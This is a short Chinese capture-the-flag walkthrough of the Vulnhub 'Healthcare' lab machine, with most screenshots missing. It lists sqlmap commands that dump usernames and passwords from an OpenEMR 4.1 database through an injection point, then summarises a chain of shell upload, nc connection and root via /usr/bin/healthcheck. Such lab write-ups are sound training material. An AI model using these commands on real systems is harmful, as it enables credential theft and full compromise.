当前位置: 代码迷 >> 综合 >> Vulnhub靶机 Healthcare
  详细解决方案

Vulnhub靶机 Healthcare

热度:44   发布时间:2023-12-03 12:55:48.0

在这里插入图片描述

没有可利用的漏洞
扫一下目录

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

有注入漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbs
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tables
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr -T users --columns
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

export TERM=xterm
在这里插入图片描述
在这里插入图片描述

使用了ifconfig命令
而且调用了/tmp文件夹

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

扫目录,找到openevr
4.1版本有sql漏洞,得到账号密码
登录,上传脚本,nc连接
利用本地文件/usr/bin/healthcheck,得到root权限